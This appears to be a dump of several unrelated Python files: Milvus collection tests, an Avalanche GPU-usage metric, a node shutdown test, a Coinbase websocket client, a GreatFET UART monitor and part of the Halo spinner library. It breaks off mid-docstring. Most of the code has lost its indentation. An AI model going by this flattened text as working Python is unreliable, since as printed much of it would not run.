class TestCollectionInvalid(object):
"""
Test creating collection with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_collection_names()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_create_collection_with_invalid_collectionname(self, connect, get_collection_name):
collection_name = get_collection_name
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
assert not status.OK()
def test_create_collection_with_empty_collectionname(self, connect):
collection_name = ''
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
def test_load_collection_with_invalid_collectionname(self, connect):
collection_name = ''
with pytest.raises(Exception) as e:
status = connect.load_collection(collection_name)
class TestCreateCollectionDimInvalid(object):
"""
Test creating collection with invalid dimension
"""
@pytest.fixture(
scope="function",
params=gen_invalid_dims()
)
def get_dim(self, request):
yield request.param
@pytest.mark.level(2)
@pytest.mark.timeout(5)
def test_create_collection_with_invalid_dimension(self, connect, get_dim):
dimension = get_dim
collection = gen_unique_str("test_create_collection_with_invalid_dimension")
param = {'collection_name': collection,
'dimension': dimension,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
if isinstance(dimension, int):
status = connect.create_collection(param)
assert not status.OK()
else:
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
# TODO: max / min index file size
class TestCreateCollectionIndexSizeInvalid(object):
"""
Test creating collections with invalid index_file_size
"""
@pytest.fixture(
scope="function",
params=gen_invalid_file_sizes()
)
def get_file_size(self, request):
yield request.param
@pytest.mark.level(2)
def test_create_collection_with_invalid_file_size(self, connect, collection, get_file_size):
file_size = get_file_size
param = {'collection_name': collection,
'dimension': dim,
'index_file_size': file_size,
'metric_type': MetricType.L2}
if isinstance(file_size, int):
status = connect.create_collection(param)
assert not status.OK()
else:
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
class TestCreateMetricTypeInvalid(object):
"""
Test creating collections with invalid metric_type
"""
@pytest.fixture(
scope="function",
params=gen_invalid_metric_types()
)
def get_metric_type(self, request):
yield request.param
@pytest.mark.level(2)
def test_create_collection_with_invalid_file_size(self, connect, collection, get_metric_type):
metric_type = get_metric_type
param = {'collection_name': collection,
'dimension': dim,
'index_file_size': 10,
'metric_type': metric_type}
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
def create_collection(connect, **params):
param = {'collection_name': params["collection_name"],
'dimension': params["dimension"],
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
return status
def search_collection(connect, **params):
status, result = connect.search(
params["collection_name"],
params["top_k"],
params["query_vectors"],
params={"nprobe": params["nprobe"]})
return status
def load_collection(connect, **params):
status = connect.load_collection(params["collection_name"])
return status
def has(connect, **params):
status, result = connect.has_collection(params["collection_name"])
return status
def show(connect, **params):
status, result = connect.list_collections()
return status
def delete(connect, **params):
status = connect.drop_collection(params["collection_name"])
return status
def describe(connect, **params):
status, result = connect.get_collection_info(params["collection_name"])
return status
def rowcount(connect, **params):
status, result = connect.count_entities(params["collection_name"])
return status
def create_index(connect, **params):
status = connect.create_index(params["collection_name"], params["index_type"], params["index_param"])
return status
func_map = {
# 0:has,
1:show,
10:create_collection,
11:describe,
12:rowcount,
13:search_collection,
14:load_collection,
15:create_index,
30:delete
}
def gen_sequence():
raw_seq = func_map.keys()
result = itertools.permutations(raw_seq)
for x in result:
yield x
class TestCollectionLogic(object):
@pytest.mark.parametrize("logic_seq", gen_sequence())
@pytest.mark.level(2)
def test_logic(self, connect, logic_seq, args):
if args["handler"] == "HTTP":
pytest.skip("Skip in http mode")
if self.is_right(logic_seq):
self.execute(logic_seq, connect)
else:
self.execute_with_error(logic_seq, connect)
    def is_right(self, seq):
        # A fully sorted sequence creates the collection before any use and
        # deletes it last, so it is always valid.
        if list(seq) == sorted(seq):
            return True
        not_created = True
        has_deleted = False
        for i in range(len(seq)):
            if seq[i] > 10 and not_created:
                return False
            elif seq[i] > 10 and has_deleted:
                return False
            elif seq[i] == 10:
                not_created = False
            elif seq[i] == 30:
                has_deleted = True
        return True
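    # Illustrative (hypothetical subsequences): (1, 10, 11, 30) is valid
    # (show, create, describe, delete), while (11, 10, 12, 30) is not,
    # because describe (11) runs before the collection is created (10).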
def execute(self, logic_seq, connect):
basic_params = self.gen_params()
for i in range(len(logic_seq)):
# logging.getLogger().info(logic_seq[i])
f = func_map[logic_seq[i]]
status = f(connect, **basic_params)
assert status.OK()
def execute_with_error(self, logic_seq, connect):
basic_params = self.gen_params()
error_flag = False
for i in range(len(logic_seq)):
f = func_map[logic_seq[i]]
status = f(connect, **basic_params)
if not status.OK():
# logging.getLogger().info(logic_seq[i])
error_flag = True
break
assert error_flag == True
def gen_params(self):
collection_name = gen_unique_str("test_collection")
top_k = 1
vectors = gen_vectors(2, dim)
param = {'collection_name': collection_name,
'dimension': dim,
'metric_type': MetricType.L2,
'nprobe': 1,
'top_k': top_k,
'index_type': IndexType.IVF_SQ8,
'index_param': {
'nlist': 16384
},
'query_vectors': vectors}
return param
|
gpu_usage.py
|
################################################################################
# Copyright (c) 2021 ContinualAI. #
# Copyrights licensed under the MIT License. #
# See the accompanying LICENSE file for terms. #
# #
# Date: 19-01-2021 #
# Author(s): Vincenzo Lomonaco, Lorenzo Pellegrini #
# E-mail: contact@continualai.org #
# Website: www.continualai.org #
################################################################################
import GPUtil
from threading import Thread
import time
import warnings
from typing import Optional, TYPE_CHECKING, List
from avalanche.evaluation import Metric, PluginMetric, GenericPluginMetric
from avalanche.evaluation.metric_results import MetricResult
if TYPE_CHECKING:
from avalanche.training import BaseStrategy
class MaxGPU(Metric[float]):
"""
The standalone GPU usage metric.
Important: this metric approximates the real maximum GPU percentage
usage since it sample at discrete amount of time the GPU values.
Instances of this metric keeps the maximum GPU usage percentage detected.
The `start_thread` method starts the usage tracking.
The `stop_thread` method stops the tracking.
The result, obtained using the `result` method, is the usage in mega-bytes.
The reset method will bring the metric to its initial state. By default
this metric in its initial state will return an usage value of 0.
"""
def __init__(self, gpu_id, every=0.5):
"""
Creates an instance of the GPU usage metric.
:param gpu_id: GPU device ID.
        :param every: seconds between updates of the maximum GPU
            usage
"""
self.every = every
self.gpu_id = gpu_id
n_gpus = len(GPUtil.getGPUs())
if n_gpus == 0:
warnings.warn("Your system has no GPU!")
self.gpu_id = None
        elif gpu_id < 0:
            warnings.warn(
                "GPU metric called with negative GPU id. GPU logging disabled."
            )
self.gpu_id = None
else:
if gpu_id >= n_gpus:
warnings.warn(f"GPU {gpu_id} not found. Using GPU 0.")
self.gpu_id = 0
self.thread = None
"""
Thread executing GPU monitoring code
"""
self.stop_f = False
"""
Flag to stop the thread
"""
self.max_usage = 0
"""
Main metric result. Max GPU usage.
"""
def _f(self):
"""
Until a stop signal is encountered,
this function monitors each `every` seconds
the maximum amount of GPU used by the process
"""
start_time = time.monotonic()
while not self.stop_f:
# GPU percentage
gpu_perc = GPUtil.getGPUs()[self.gpu_id].load * 100
if gpu_perc > self.max_usage:
self.max_usage = gpu_perc
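            # Sleep until the next multiple of `every` since start_time, so
            # the sampling period stays fixed regardless of poll duration.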
time.sleep(
self.every - ((time.monotonic() - start_time) % self.every)
)
def start_thread(self):
if self.gpu_id is not None:
assert not self.thread, (
"Trying to start thread " "without joining the previous."
)
self.thread = Thread(target=self._f, daemon=True)
self.thread.start()
def stop_thread(self):
if self.thread:
self.stop_f = True
self.thread.join()
self.stop_f = False
self.thread = None
def reset(self) -> None:
"""
Resets the metric.
:return: None.
"""
self.max_usage = 0
def result(self) -> Optional[float]:
"""
Returns the max GPU percentage value.
        :return: The maximum GPU usage as a float percentage in range [0, 100].
"""
return self.max_usage
def update(self):
pass
class GPUPluginMetric(GenericPluginMetric[float]):
def __init__(self, gpu_id, every, reset_at, emit_at, mode):
self.gpu_id = gpu_id
self._gpu = MaxGPU(gpu_id, every)
super(GPUPluginMetric, self).__init__(
self._gpu, reset_at=reset_at, emit_at=emit_at, mode=mode
)
def update(self, strategy):
self._gpu.update()
class MinibatchMaxGPU(GPUPluginMetric):
"""
The Minibatch Max GPU metric.
This plugin metric only works at training time.
"""
def __init__(self, gpu_id, every=0.5):
"""
Creates an instance of the Minibatch Max GPU metric
:param gpu_id: GPU device ID.
        :param every: seconds between updates of the maximum GPU
            usage
"""
super(MinibatchMaxGPU, self).__init__(
gpu_id,
every,
reset_at="iteration",
emit_at="iteration",
mode="train",
)
def before_training(self, strategy: "BaseStrategy") -> None:
super().before_training(strategy)
self._gpu.start_thread()
def after_training(self, strategy: "BaseStrategy") -> None:
        super().after_training(strategy)
self._gpu.stop_thread()
def __str__(self):
return f"MaxGPU{self.gpu_id}Usage_MB"
class EpochMaxGPU(GPUPluginMetric):
"""
The Epoch Max GPU metric.
This plugin metric only works at training time.
"""
def __init__(self, gpu_id, every=0.5):
"""
Creates an instance of the epoch Max GPU metric.
:param gpu_id: GPU device ID.
        :param every: seconds between updates of the maximum GPU
            usage
"""
super(EpochMaxGPU, self).__init__(
gpu_id, every, reset_at="epoch", emit_at="epoch", mode="train"
)
def before_training(self, strategy: "BaseStrategy"):
super().before_training(strategy)
self._gpu.start_thread()
def after_training(self, strategy: "BaseStrategy") -> None:
self._gpu.stop_thread()
def __str__(self):
return f"MaxGPU{self.gpu_id}Usage_Epoch"
class ExperienceMaxGPU(GPUPluginMetric):
"""
The Experience Max GPU metric.
This plugin metric only works at eval time.
"""
def __init__(self, gpu_id, every=0.5):
"""
        Creates an instance of the Experience Max GPU metric.
        :param gpu_id: GPU device ID.
        :param every: seconds between updates of the maximum GPU
            usage
"""
super(ExperienceMaxGPU, self).__init__(
gpu_id,
every,
reset_at="experience",
emit_at="experience",
mode="eval",
)
def before_eval(self, strategy: "BaseStrategy"):
super().before_eval(strategy)
self._gpu.start_thread()
def after_eval(self, strategy: "BaseStrategy"):
super().after_eval(strategy)
self._gpu.stop_thread()
def __str__(self):
return f"MaxGPU{self.gpu_id}Usage_Experience"
class StreamMaxGPU(GPUPluginMetric):
"""
The Stream Max GPU metric.
This plugin metric only works at eval time.
"""
def __init__(self, gpu_id, every=0.5):
"""
        Creates an instance of the Stream Max GPU metric.
        :param gpu_id: GPU device ID.
        :param every: seconds between updates of the maximum GPU
            usage
"""
super(StreamMaxGPU, self).__init__(
gpu_id, every, reset_at="stream", emit_at="stream", mode="eval"
)
def before_eval(self, strategy):
super().before_eval(strategy)
self._gpu.start_thread()
def after_eval(self, strategy: "BaseStrategy") -> MetricResult:
packed = super().after_eval(strategy)
self._gpu.stop_thread()
return packed
def __str__(self):
return f"MaxGPU{self.gpu_id}Usage_Stream"
def gpu_usage_metrics(
gpu_id,
every=0.5,
minibatch=False,
epoch=False,
experience=False,
stream=False,
) -> List[PluginMetric]:
"""
Helper method that can be used to obtain the desired set of
plugin metrics.
:param gpu_id: GPU device ID.
    :param every: seconds between updates of the maximum GPU
        usage
:param minibatch: If True, will return a metric able to log the minibatch
max GPU usage.
:param epoch: If True, will return a metric able to log the epoch
max GPU usage.
:param experience: If True, will return a metric able to log the experience
max GPU usage.
:param stream: If True, will return a metric able to log the evaluation
max stream GPU usage.
:return: A list of plugin metrics.
"""
metrics = []
if minibatch:
metrics.append(MinibatchMaxGPU(gpu_id, every))
if epoch:
metrics.append(EpochMaxGPU(gpu_id, every))
if experience:
metrics.append(ExperienceMaxGPU(gpu_id, every))
if stream:
metrics.append(StreamMaxGPU(gpu_id, every))
return metrics
__all__ = [
"MaxGPU",
"MinibatchMaxGPU",
"EpochMaxGPU",
"ExperienceMaxGPU",
"StreamMaxGPU",
"gpu_usage_metrics",
]
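# A minimal usage sketch (hypothetical setup; assumes the usual Avalanche
# EvaluationPlugin wiring):
#
#   from avalanche.training.plugins import EvaluationPlugin
#
#   eval_plugin = EvaluationPlugin(
#       *gpu_usage_metrics(gpu_id=0, every=0.5, epoch=True, experience=True),
#       loggers=[...],  # e.g. an InteractiveLogger
#   )
#   # pass eval_plugin as the `evaluator` argument of a strategy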
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Cruro Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test bitcoind shutdown."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
websocket_client.py
|
# cbpro/WebsocketClient.py
# original author: Daniel Paquin
# mongo "support" added by Drew Rice
#
#
# Template object to receive messages from the Coinbase Websocket Feed
from __future__ import print_function
import json
import base64
import hmac
import hashlib
import time
from threading import Thread
from websocket import create_connection, WebSocketConnectionClosedException
from pymongo import MongoClient
from cbpro.cbpro_auth import get_auth_headers
import logging
LOGGER = logging.getLogger(__name__)
class WebsocketClient(object):
def __init__(
self,
url="wss://ws-feed.pro.coinbase.com",
products=None,
message_type="subscribe",
mongo_collection=None,
should_print=True,
auth=False,
api_key="",
api_secret="",
api_passphrase="",
# Make channels a required keyword-only argument; see pep3102
*,
# Channel options: ['ticker', 'user', 'matches', 'level2', 'full']
channels):
self.url = url
self.products = products
self.channels = channels
self.type = message_type
self.stop = True
self.error = None
self.ws = None
self.thread = None
self.auth = auth
self.api_key = api_key
self.api_secret = api_secret
self.api_passphrase = api_passphrase
self.should_print = should_print
self.mongo_collection = mongo_collection
    def start(self):
        self.stop = False
        self.on_open()
        # Establish the connection synchronously, then listen on a worker
        # thread; _listen() starts the keepalive thread once the socket is up.
        self._connect()
        self.thread = Thread(target=self._listen)
        self.keepalive = Thread(target=self._keepalive)
        self.thread.start()
        return self.ws
def _connect(self):
if self.products is None:
self.products = ["BTC-USD"]
elif not isinstance(self.products, list):
self.products = [self.products]
if self.url[-1] == "/":
self.url = self.url[:-1]
        if self.channels is None:
            self.channels = [{"name": "ticker", "product_ids": [product_id for product_id in self.products]}]
        sub_params = {'type': 'subscribe', 'product_ids': self.products, 'channels': self.channels}
if self.auth:
timestamp = str(time.time())
message = timestamp + 'GET' + '/users/self/verify'
auth_headers = get_auth_headers(timestamp, message, self.api_key, self.api_secret, self.api_passphrase)
sub_params['signature'] = auth_headers['CB-ACCESS-SIGN']
sub_params['key'] = auth_headers['CB-ACCESS-KEY']
sub_params['passphrase'] = auth_headers['CB-ACCESS-PASSPHRASE']
sub_params['timestamp'] = auth_headers['CB-ACCESS-TIMESTAMP']
        self.ws = create_connection(self.url)
        LOGGER.info("Connected websocket")
self.ws.send(json.dumps(sub_params))
def _keepalive(self, interval=30):
while self.ws.connected:
self.ws.ping("keepalive")
LOGGER.debug("keepalive")
time.sleep(interval)
def _listen(self):
self.keepalive.start()
while not self.stop:
try:
data = self.ws.recv()
msg = json.loads(data)
except ValueError as e:
self.on_error(e)
except Exception as e:
self.on_error(e)
else:
self.on_message(msg)
def _disconnect(self):
try:
if self.ws:
self.ws.close()
except WebSocketConnectionClosedException as e:
pass
finally:
self.keepalive.join()
self.on_close()
def close(self):
self.stop = True # will only disconnect after next msg recv
self._disconnect() # force disconnect so threads can join
self.thread.join()
def on_open(self):
if self.should_print:
print("-- Subscribed! --\n")
def on_close(self):
if self.should_print:
print("\n-- Socket Closed --")
def on_message(self, msg):
if self.should_print:
print(msg)
if self.mongo_collection: # dump JSON to given mongo collection
self.mongo_collection.insert_one(msg)
def on_error(self, e, data=None):
self.error = e
self.stop = True
print('{} - data: {}'.format(e, data))
if __name__ == "__main__":
import sys
import cbpro
import time
class MyWebsocketClient(cbpro.WebsocketClient):
def on_open(self):
self.url = "wss://ws-feed.pro.coinbase.com/"
self.products = ["BTC-USD", "ETH-USD"]
self.message_count = 0
print("Let's count the messages!")
def on_message(self, msg):
print(json.dumps(msg, indent=4, sort_keys=True))
self.message_count += 1
def on_close(self):
print("-- Goodbye! --")
wsClient = MyWebsocketClient()
wsClient.start()
print(wsClient.url, wsClient.products)
try:
while True:
print("\nMessageCount =", "%i \n" % wsClient.message_count)
time.sleep(1)
except KeyboardInterrupt:
wsClient.close()
if wsClient.error:
sys.exit(1)
else:
sys.exit(0)
|
greatfet_uart.py
|
#!/usr/bin/env python3
#
# This file is part of GreatFET.
#
from __future__ import print_function, absolute_import
import os
import sys
import time
import queue
import select
import threading
import greatfet
from greatfet import GreatFET
from greatfet.utils import from_eng_notation, GreatFETArgumentParser
from greatfet.util.console import Console
from greatfet.interfaces.uart import UART
console = None
input_thread = None
termination_request = None
last_keycodes = bytearray()
def input_handler(console, input_queue, termination_request):
""" Thread body that gathers input from the user and enqueues it for processing. """
def should_check_for_data():
if os.name == 'posix':
return select.select([sys.stdin], [], [], 0) != ([], [], [])
else:
return True
while not termination_request.is_set():
# If we don't have data waiting, skip this iteration.
# This prevents us from entering a blocking read and sticking there
# after termination is desired.
if not should_check_for_data():
time.sleep(0.01)
continue
key = console.getkey()
input_queue.put(key)
def exit(code):
termination_request.set()
input_thread.join()
console.cleanup()
sys.exit(code)
def handle_special_functions(keycode):
""" Handles any special functions associated with the relevant key. """
global last_keycodes
    # Keep track of the last two keycodes: just enough to detect the
    # CTRL+A, CTRL+C exit sequence below. Trim older entries as we go.
last_keycodes.extend(keycode)
while len(last_keycodes) > 2:
last_keycodes.pop(0)
# If the user's entered CTRL+A, CTRL+C, exit.
if last_keycodes.endswith(b"\x01\x03"):
exit(0)
def main():
""" Core command. """
global input_thread, termination_request, console
parity_modes = {
'none': UART.PARITY_NONE,
'odd': UART.PARITY_ODD,
'even': UART.PARITY_EVEN,
'one': UART.PARITY_STUCK_AT_ONE,
'zero': UART.PARITY_STUCK_AT_ZERO
}
# Set up a simple argument parser.
# TODO: support configurations such as '8n1'
parser = GreatFETArgumentParser(description="Simple GreatFET UART monitor.", verbose_by_default=True)
parser.add_argument('baud', nargs='?', type=from_eng_notation, default=115200, help="Baud rate; in symbols/second. Defaults to 115200.")
parser.add_argument('-d', '--data', type=int, default=8, help="The number of data bits per frame.")
parser.add_argument('-S', '--stop', type=int, default=1, help="The number of stop bits per frame.")
parser.add_argument('-P', '--parity', choices=parity_modes, default='none', help="The type of parity to use.")
parser.add_argument('-E', '--echo', action='store_true', help="If provided, local echo will be enabled.")
parser.add_argument('-N', '--no-newline-translation', action='store_false', dest='tr_newlines',
help="Provide this option to disable newline translation.")
args = parser.parse_args()
device = parser.find_specified_device()
# Grab our log functions.
log_function, log_error = parser.get_log_functions()
# Configure our UART.
if not hasattr(device, 'uart'):
log_error("This device doesn't appear to support the UART API. Perhaps it needs a firmware upgrade?")
sys.exit(-1)
# Notify the user that we're entering monitor mode.
log_function("Entering monitor mode. To terminate, type CTRL+A, then CTRL+C.")
# Create a console object.
console = Console()
console.setup()
# Create a thread to capture input data into a locally-processed queue.
input_queue = queue.Queue()
termination_request = threading.Event()
input_thread = threading.Thread(target=input_handler, args=(console, input_queue, termination_request))
input_thread.start()
# Configure our UART parameters.
device.uart.update_parameters(baud=args.baud, data_bits=args.data, stop_bits=args.stop, parity=parity_modes[args.parity])
# Generate our UART monitor.
while True:
# Grab any data from the serial port, and print it to the screen.
data = device.uart.read()
        # If we're performing newline translation, prepend a "\r" to any newline.
if args.tr_newlines and (data == b"\n"):
console.write_bytes(b"\r")
# Stick the UART data onscreen.
console.write_bytes(data)
# Grab any data from the user, and send it via serial.
try:
new_key = input_queue.get_nowait()
handle_special_functions(new_key)
# If local echo is on, print the character to our local console.
if args.echo:
sys.stdout.buffer.write(new_key)
if args.tr_newlines and (new_key == b"\n"):
device.uart.write(b"\r")
device.uart.write(new_key)
except queue.Empty:
pass
if __name__ == '__main__':
main()
|
halo.py
|
# -*- coding: utf-8 -*-
# pylint: disable=unsubscriptable-object
"""Beautiful terminal spinners in Python.
"""
from __future__ import absolute_import, unicode_literals
import atexit
import functools
import sys
import threading
import time
import re
import halo.cursor as cursor
from log_symbols.symbols import LogSymbols
from spinners.spinners import Spinners
from halo._utils import (
colored_frame,
decode_utf_8_text,
get_environment,
get_terminal_columns,
is_supported,
is_text_type,
encode_utf_8_text,
)
class Halo(object):
"""Halo library.
Attributes
----------
CLEAR_LINE : str
Code to clear the line
"""
CLEAR_LINE = "\033[K"
SPINNER_PLACEMENTS = (
"left",
"right",
)
def __init__(
self,
text="",
color="cyan",
text_color=None,
spinner=None,
animation=None,
placement="left",
interval=-1,
enabled=True,
stream=sys.stdout,
):
"""Constructs the Halo object.
Parameters
----------
text : str, optional
Text to display.
text_color : str, optional
Color of the text.
color : str, optional
Color of the text to display.
spinner : str|dict, optional
String or dictionary representing spinner. String can be one of 60+ spinners
supported.
animation: str, optional
Animation to apply if text is too large. Can be one of `bounce`, `marquee`.
Defaults to ellipses.
placement: str, optional
Side of the text to place the spinner on. Can be `left` or `right`.
Defaults to `left`.
interval : integer, optional
Interval between each frame of the spinner in milliseconds.
enabled : boolean, optional
Spinner enabled or not.
stream : io, optional
Output.
"""
        # Initial values, restored by the property deleters
self.reset_values = {"text": text,
"color": color,
"text_color": text_color,
"spinner": spinner,
"animation": animation,
"placement": placement, }
self._symbol = " "
self._stop_persist = False
self._color = color
self._animation = animation
self.spinner = spinner
self.text = text
self._text_color = text_color
self._interval = (
int(interval) if int(interval) > 0 else self._spinner["interval"]
)
self._stream = stream
self.placement = placement
self._frame_index = 0
self._text_index = 0
self._spinner_thread = None
self._stop_spinner = None
self._spinner_id = None
self.enabled = enabled
environment = get_environment()
def clean_up():
"""Handle cell execution"""
self.stop()
if environment in ("ipython", "jupyter"):
from IPython import get_ipython
ip = get_ipython()
ip.events.register("post_run_cell", clean_up)
else: # default terminal
atexit.register(clean_up)
def __enter__(self):
"""Starts the spinner on a separate thread. For use in context managers.
Returns
-------
self
"""
return self.start()
def __exit__(self, type, value, traceback):
"""Stops the spinner with show text at the end or not. For use in context managers."""
if self._stop_persist:
self.stop_and_persist(symbol=self._symbol, text=self.text)
else:
self.stop()
def __call__(self, f):
"""Allow the Halo object to be used as a regular function decorator."""
@functools.wraps(f)
def wrapped(*args, **kwargs):
with self:
self._change_text(f, *args, **kwargs)
return f(*args, **kwargs)
return wrapped
def _change_text(self, f, *args, **kwargs):
"""if you want to change text in decorator as your function is in a loop
* you have to use halo_iter as the argument of function
* if you want to show finished text use stop_persist:bool, stop_text:str and stop_symbol:str
Args:
f (callable): the function which supposed to be in a loop
"""
if "halo_iter" in kwargs:
if type(kwargs['halo_iter']) in [list, tuple, dict]:
                main_text = self.text  # text with curly-bracket placeholders,
                # e.g. 'This is task {number}'
                curl_brackets = re.findall(
                    r'\{([^\s\{\}]+)\}', main_text)
                results = []  # collects each f(*args, **kwargs) return value
                for text in kwargs['halo_iter']:
                    # text is a str for a single placeholder,
                    # or a list of str for multiple placeholders
text_dict = dict(list(zip(curl_brackets, text))) if len(
curl_brackets) > 1 else dict([(curl_brackets[0], text)])
self.text = main_text.format(**text_dict)
results.append(f(*args, **kwargs))
if 'stop_text' in kwargs:
self._stop_persist = True
self.text = kwargs['stop_text']
if 'stop_symbol' in kwargs:
self._stop_persist = True
self._symbol = kwargs['stop_symbol']
else:
self._symbol = ' '
return results
else:
self._stop_persist = False
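    # Illustrative decorator usage (hypothetical function and values): the
    # iterable passed as `halo_iter` drives the '{n}' placeholder, and
    # `stop_text` is persisted once the loop finishes:
    #
    #   @Halo(text="Processing item {n}")
    #   def process(*args, halo_iter=(), stop_text=None, **kwargs):
    #       ...
    #
    #   process(halo_iter=["1", "2", "3"], stop_text="All done")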
@property
def spinner(self):
"""Getter for spinner property.
Returns
-------
dict
spinner value
"""
return self._spinner
@spinner.setter
def spinner(self, spinner=None):
"""Setter for spinner property.
Parameters
----------
spinner : dict, str
Defines the spinner value with frame and interval
"""
self._spinner = self._get_spinner(spinner)
self._frame_index = 0
self._text_index = 0
@spinner.deleter
def spinner(self):
"""set spinner to None when delete spinner is
"""
self._spinner = self.reset_values["spinner"]
@property
def text(self):
"""Getter for text property.
Returns
-------
str
text value
"""
return self._text["original"]
@text.setter
def text(self, text):
"""Setter for text property.
Parameters
----------
text : str
Defines the text value for spinner
"""
self._text = self._get_text(text)
@text.deleter
def text(self):
self._text = self.reset_values["text"]
@property
def text_color(self):
"""Getter for text color property.
Returns
-------
str
text color value
"""
return self._text_color
@text_color.setter
def text_color(self, text_color):
"""Setter for text color property.
Parameters
----------
text_color : str
Defines the text color value for spinner
"""
self._text_color = text_color
@text_color.deleter
def text_color(self):
self._text_color = self.reset_values["text_color"]
@property
def color(self):
"""Getter for color property.
Returns
-------
str
color value
"""
return self._color
@color.setter
def color(self, color):
"""Setter for color property.
Parameters
----------
color : str
Defines the color value for spinner
"""
self._color = color
@color.deleter
def color(self):
self._color = self.reset_values["color"]
@property
def placement(self):
"""Getter for placement property.
Returns
-------
str
spinner placement
"""
return self._placement
@placement.setter
def placement(self, placement):
"""Setter for placement property.
Parameters
----------
placement: str
Defines the placement of the spinner
"""
if placement not in self.SPINNER_PLACEMENTS:
raise ValueError(
"Unknown spinner placement '{0}', available are {1}".format(
placement, self.SPINNER_PLACEMENTS
)
)
self._placement = placement
@placement.deleter
def placement(self):
self.placement = self.reset_values["placement"]
@property
def spinner_id(self):
"""Getter for spinner id
Returns
-------
str
Spinner id value
"""
return self._spinner_id
@property
def animation(self):
"""Getter for animation property.
Returns
-------
str
Spinner animation
"""
return self._animation
@animation.setter
def animation(self, animation):
"""Setter for animation property.
Parameters
----------
animation: str
Defines the animation of the spinner
"""
self._animation = animation
self._text = self._get_text(self._text["original"])
@animation.deleter
def animation(self):
self._animation = self.reset_values["animation"]
def _check_stream(self):
"""Returns whether the stream is open, and if applicable, writable
Returns
-------
bool
Whether the stream is open
"""
if self._stream.closed:
return False
try:
# Attribute access kept separate from invocation, to avoid
# swallowing AttributeErrors from the call which should bubble up.
check_stream_writable = self._stream.writable
except AttributeError:
pass
else:
return check_stream_writable()
return True
def _write(self, s):
"""Write to the stream, if writable
Parameters
----------
s : str
Characters to write to the stream
"""
if self._check_stream():
self._stream.write(s)
def _hide_cursor(self):
"""Disable the user's blinking cursor
"""
if self._check_stream() and self._stream.isatty():
cursor.hide(stream=self._stream)
def _show_cursor(self):
"""Re-enable the user's blinking cursor
"""
if self._check_stream() and self._stream.isatty():
cursor.show(stream=self._stream)
def _get_spinner(self, spinner):
"""Extracts spinner value from options and returns value
containing spinner frames and interval, defaults to 'dots' spinner.
Parameters
----------
spinner : dict, str
Contains spinner value or type of spinner to be used
Returns
-------
dict
Contains frames and interval defining spinner
"""
default_spinner = Spinners["dots"].value
if spinner and type(spinner) == dict:
return spinner
if is_supported():
return Spinners[spinner].value if all([is_text_type(spinner), spinner in Spinners.__members__]) else default_spinner
else:
return Spinners["line"].value
def _get_text(self, text):
"""Creates frames based on the selected animation
Returns
-------
self
"""
animation = self._animation
stripped_text = text.strip()
# Check which frame of the animation is the widest
max_spinner_length = max([len(i) for i in self._spinner["frames"]])
# Subtract to the current terminal size the max spinner length
# (+1 to leave room for the extra space between spinner and text)
terminal_width = get_terminal_columns() - (max_spinner_length + 1)
text_length = len(stripped_text)
frames = []
if terminal_width < text_length and animation:
if animation == "bounce":
"""
Make the text bounce back and forth
"""
for x in range(0, text_length - terminal_width + 1):
frames.append(stripped_text[x: terminal_width + x])
frames.extend(list(reversed(frames)))
elif "marquee":
"""
Make the text scroll like a marquee
"""
stripped_text = stripped_text + " " + \
stripped_text[:terminal_width]
for x in range(0, text_length + 1):
frames.append(stripped_text[x: terminal_width + x])
elif terminal_width < text_length and not animation:
# Add ellipsis if text is larger than terminal width and no animation was specified
frames = [stripped_text[: terminal_width - 6] + " (...)"]
else:
frames = [stripped_text]
return {"original": text, "frames": frames}
def clear(self):
"""Clears the line and returns cursor to the start.
of line
Returns
-------
self
"""
self._write("\r")
self._write(self.CLEAR_LINE)
return self
def _render_frame(self):
"""Renders the frame on the line after clearing it.
"""
if not self.enabled:
            # If we're disabled or the stream closed mid-render, skip the
            # write; rendering resumes from the current frame index if we're
            # re-enabled or the stream opens again.
return
self.clear()
frame = self.frame()
output = "\r{}".format(frame)
try:
self._write(output)
except UnicodeEncodeError:
self._write(encode_utf_8_text(output))
def render(self):
"""Runs the render until thread flag is set.
Returns
-------
self
"""
while not self._stop_spinner.is_set():
self._render_frame()
time.sleep(0.001 * self._interval)
return self
def frame(self):
"""Builds and returns the frame to be rendered
Returns
-------
self
"""
frames = self._spinner["frames"]
frame = frames[self._frame_index]
if self._color:
frame = colored_frame(frame, self._color)
self._frame_index += 1
self._frame_index = self._frame_index % len(frames)
text_frame = self.text_frame()
return "{0} {1}".format(
*[
(text_frame, frame)
if self._placement == "right"
else (frame, text_frame)
][0]
)
def text_frame(self):
"""Builds and returns the text frame to be rendered
Returns
-------
self
"""
if len(self._text["frames"]) == 1:
if self._text_color:
return colored_frame(self._text["frames"][0], self._text_color)
# Return first frame (can't return original text because at this point it might be ellipsed)
return self._text["frames"][0]
frames = self._text["frames"]
frame = frames[self._text_index]
self._text_index += 1
self._text_index = self._text_index % len(frames)
if self._text_color:
return colored_frame(frame, self._text_color)
return frame
def start(self, text=None):
"""Starts the spinner on a separate thread.
Parameters
----------
text : None, optional
